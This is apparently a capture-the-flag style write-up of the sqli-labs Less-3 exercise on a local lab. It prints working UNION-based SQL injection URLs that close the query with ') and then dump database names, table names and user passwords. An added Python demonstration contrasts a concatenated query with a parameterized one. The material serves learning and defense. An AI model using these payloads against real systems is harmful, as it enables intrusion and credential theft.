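Load the page normally and look at the URL, then begin blind injection testing on the id parameter.

The usual probe characters are ' " and ). Test with them to determine whether the parameter is numeric or a string.

Testing shows there is no 4th column, so there are only 3.

Run the usual tests to get the databases:
http://127.0.0.1/sqli/Less-3/?id=-1%27)%20union%20select%201,group_concat(schema_name%20),3%20from%20information_schema.schemata--+

Then get the tables:
http://127.0.0.1/sqli/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x75736572--+

Get the passwords through column injection:
http://127.0.0.1/sqli/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(concat_ws(%22~%22,username,password))%20from%20security.users--+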
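Why the ') closure works and what removes it, as an added example that is not part of the original write-up. It assumes the lab page builds its query by pasting id between (' and '), uses an in-memory SQLite table with constructed rows in place of the lab's MySQL database, and all function names are hypothetical.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the lab's users table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-a"), (2, "bob", "pw-b")])
    return db

def lookup_concat(db, user_id):
    """Assumed vulnerable shape: the raw id is pasted between (' and ')."""
    sql = "SELECT id, username, password FROM users WHERE id=('" + user_id + "') LIMIT 0,1"
    return db.execute(sql).fetchone()

def lookup_param(db, user_id):
    """Hardened shape: the id is bound as data and never parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id=(?) LIMIT 0,1"
    return db.execute(sql, (user_id,)).fetchone()

def run(lookup, db, user_id):
    """Return the row, or the string 'error' when the database rejects the SQL."""
    try:
        return lookup(db, user_id)
    except sqlite3.Error:
        return "error"

# Inputs shaped like the ones in the write-up: a lone quote, then the ') closure.
QUOTE_PROBE = "1'"
UNION_INPUT = "-1') union select 1,2,group_concat(username) from users-- "

def compare():
    """Run each input through both lookups: name -> (concatenated, parameterized)."""
    db = make_db()
    return {name: (run(lookup_concat, db, value), run(lookup_param, db, value))
            for name, value in [("normal", "1"), ("quote", QUOTE_PROBE), ("union", UNION_INPUT)]}

if __name__ == "__main__":
    for name, (concat, param) in compare().items():
        print(f"{name:7} concatenated={concat!r} parameterized={param!r}")
```

The lone quote breaks the concatenated statement and the union input changes what it returns, while the bound parameter yields no row for either input.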